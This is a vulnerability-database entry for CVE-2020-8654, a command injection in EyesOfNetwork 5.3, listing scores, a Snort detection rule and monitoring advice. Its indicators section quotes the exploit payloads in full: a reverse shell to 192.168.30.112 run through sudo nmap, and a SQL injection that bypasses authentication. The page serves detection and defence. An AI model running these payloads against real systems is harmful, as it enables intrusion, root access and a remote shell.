cbcvebase.
CVE-2020-8654
published 2020-02-07

CVE-2020-8654: An issue was discovered in EyesOfNetwork 5.3. An authenticated web user with sufficient privileges could abuse the AutoDiscovery module to run arbitrary OS…

PriorityP276high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
85.65%
99.7th percentile
An issue was discovered in EyesOfNetwork 5.3. An authenticated web user with sufficient privileges could abuse the AutoDiscovery module to run arbitrary OS commands via the /module/module_frame/index.php autodiscovery.php target field.

Affected

1 ranges
VendorProductVersion rangeFixed in
eyesofnetworkeyesofnetwork

Detection & IOCsextracted from sources · hover to see the quote

url/lilac/autodiscovery.php
url/eonapi/getApiKey
url/eonapi/createEonUser
path/tmp/h4k
path/usr/bin/nmap
command;id #
command;echo "local os = require \"os\" hostrule=function(host) os.execute(\"/bin/sh -i >& /dev/tcp/192.168.30.112/8081 0>&1\") end action=function() end" > /tmp/h4k;sudo /usr/bin/nmap localhost -p 1337 -script /tmp/h4k #
url/eonapi/getApiKey?&username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT EyesOfNetwork Autodiscover Command Injection (CVE-2020-8654)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/lilac/autodiscovery.php"; endswith; fast_pattern; http.request_body; content:"request=autodiscover"; nocase; content:"job_name="; nocase; content:"nmap_binary"; nocase; content:"target[]"; nocase; content:"os.execute("; nocase; reference:url,www.exploit-db.com/exploits/48169; reference:cve,2020-8654; reference:cve,2020-8655; classtype:attempted-admin; sid:2034311; rev:1; metadata:attack_target Server, created_at 2021_11_01, cve CVE_2020_8654, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2021_11_01, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
  • Exploit POST requests to /lilac/autodiscovery.php contain the body parameters: request=autodiscover, job_name=, nmap_binary, target[], and os.execute( — all present simultaneously indicate active exploitation.
  • The injection payload is placed in the target[] POST parameter and begins with a semicolon to break out of the nmap command context, e.g. ';id #' or ';echo ... > /tmp/h4k;sudo /usr/bin/nmap ...'.
  • The exploit writes a malicious Nmap NSE script to /tmp/h4k and then invokes 'sudo /usr/bin/nmap localhost -p 1337 -script /tmp/h4k' for privilege escalation. Monitor for nmap spawned by apache user with --script pointing to /tmp/.
  • Authentication bypass via SQL injection uses the /eonapi/getApiKey endpoint with a UNION SELECT payload in the username parameter. Monitor for 'union select' strings in GET requests to /eonapi/getApiKey.
  • The exploit tool uses a distinctive non-standard User-Agent string for all HTTP requests; presence of this UA in web logs targeting EON endpoints is a strong indicator of exploit tool usage.
  • Successful exploitation results in a new admin user being created via POST to /eonapi/createEonUser. Monitor for unexpected admin user creation events in EON API logs.
  • Version fingerprinting probe: attackers GET /css/eonweb.css and extract the '# VERSION :' string via regex to confirm a vulnerable EON version (5.1–5.3) before exploiting.
  • ·HTTPS (SSL on port 443) is required for the Metasploit module to function; the exploit will not work over plain HTTP.
  • ·The exploit requires valid credentials for a user with administrative privileges, but can bypass authentication via a hardcoded API key (CVE-2020-8657) or SQL injection (CVE-2020-8656).
  • ·The Nuclei detection template only performs a passive version check via /css/eonweb.css and does not actively trigger the vulnerability; it matches EON versions equal to 5.1 through 5.3.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.